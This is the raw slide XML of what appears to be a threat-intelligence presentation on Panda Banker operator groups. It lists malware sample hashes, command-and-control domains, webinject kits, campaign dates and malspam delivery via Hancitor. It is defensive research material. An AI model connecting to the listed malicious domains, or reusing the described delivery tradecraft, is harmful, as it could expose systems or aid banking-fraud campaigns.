              <a:rPr lang="en-US" dirty="0"/>
              <a:t> March 2018 – October 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Versions:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.6.1 – 2.6.10 (missing 3 versions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Botnets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ank</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Switched to Osiris (Kronos): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>End of July 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https://www.proofpoint.com/us/threat-insight/post/kronos-reborn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“Japan Gang”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D59BE80E-1B60-2544-AEAA-B9A8B7334833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1143000"/>
            <a:ext cx="12192000" cy="1090264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23735301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b="1" dirty="0"/>
              <a:t>Distribution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“Japan Gang”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2887736-4E6C-384E-984A-3815FD939B8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2050409"/>
            <a:ext cx="7581934" cy="3003550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C5C4EF3-681E-4B48-96EF-E54BEEB34118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5188386"/>
            <a:ext cx="8946745" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Source: @kafeine and https://www.proofpoint.com/us/threat-insight/post/kronos-reborn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2075134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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Targeting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://asert.arbornetworks.com/panda-banker-zeros-in-on-japanese-targets/ (March 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Japan (August 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>c6911d26991f413ea33919910af300f2083dbc55c559bd2f31c9028da40b6a06</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: uiaoduiiej.chimkent.su, miliocife.aktyubinsk.su </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~27</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“.::grab” and “.::CC+VBV Grabber” kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2: kioxixu.abkhazia.su</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="465138" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“Japan Gang”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20840117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463" y="2286000"/>
            <a:ext cx="10972800" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Samples:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ~140</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Oldest: fea136e75f7beb7994f2e47cd79e4e58f8dec5148e815564df5a159161ebc83c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: lavelisa.xyz, palamicha.xyz, gusmaz.xyz, kapasur.xyz, romtara.xyz, veneshem.xyz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Newest: 45c7c91ebb315a77dd28e0092913184cb6a4a8d0387d29384b273ebf9bce9a74</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: theeunload.website, nodoimain.local </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activity:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> September 2017 – October 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Versions:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.5.2 – 2.6.10 (missing 5 versions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Botnets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.5.7_sas, 05-07-2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TA542</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“Emotet Gang”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7BF74B-581F-4D47-ABC7-AF250FE2DD62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1141863"/>
            <a:ext cx="12192000" cy="1322413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11310175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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Targeting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>US and Canada (September 2017)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>d898d1ed36e0efa86533814594d36ea953c96dcd94ab32d8dec57ac731f2c1ea</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: kapasur.xyz, lavelisa.xyz, palamicha.xyz, gusmaz.xyz </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“myjs1” kit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2: farleza.co</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="238125" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>US and Canada (August 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>45c7c91ebb315a77dd28e0092913184cb6a4a8d0387d29384b273ebf9bce9a74</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: theeunload.website, nodoimain.local</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~186</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“r=“, “.::grab”, and “tables” kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2: wellfastm.trade, milloa.com, k1s0lokio.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“Emotet Gang”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7351327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463" y="2286000"/>
            <a:ext cx="10972800" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Samples:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ~120</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Oldest: 8646acb4bc76aa2221b3fd885305937710f90866f61139d08bee44d3b22902b8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s:  tontrumuchtors.com, henfobuthis.com, rowrorofrat.com, linghogolac.ru, mysitothar.ru, oftmitinrob.ru</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Newest: 0faba459f37dd11ad44631f644062421a9efed20b511279c9adfd0dc4729c0f5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: sincirewdo.ru, therepmeat.ru, nobotanri.ru, veintitna.ru, lachistontfi.ru</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activity:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> October 2017 – present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Versions:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.5.7 – 2.6.10 (missing 3 versions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Botnets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.5.7_2, 2.6.4_2, 2.6.9_d, 2.6.10_e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TA511</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“Hancitor Gang”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33726147-2EBD-9C4A-AB13-760DFC79AC40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1137" y="1143000"/>
            <a:ext cx="12192000" cy="1329315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327264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First Contact </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AFB6CD2-6C43-F247-AFAF-23F146BDDA20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5029200"/>
            <a:ext cx="11226215" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Source: https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5653B73-7616-394D-9B6E-0F96B9606764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1143000"/>
            <a:ext cx="7804150" cy="3803853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30177117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b="1" dirty="0"/>
              <a:t>Distribution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malspam (October 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL links to a Word document with macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IRS theme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hancitor (Tordal) loader </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: howonehimun.com, onbihoge.ru, rabmiarco.ru</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Panda Banker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0faba459f37dd11ad44631f644062421a9efed20b511279c9adfd0dc4729c0f5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: sincirewdo.ru, therepmeat.ru, nobotanri.ru, veintitna.ru, lachistontfi.ru</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No webinjects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“Hancitor Gang”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F507BC-50B1-1B45-BA1A-625F70D49002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="381000"/>
            <a:ext cx="4929037" cy="5740991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32131076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b="1" dirty="0"/>
              <a:t>Distribution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malspam (October 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL links to a Word document with macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IRS theme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hancitor (Tordal) loader </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: howonehimun.com, onbihoge.ru, rabmiarco.ru</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Panda Banker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
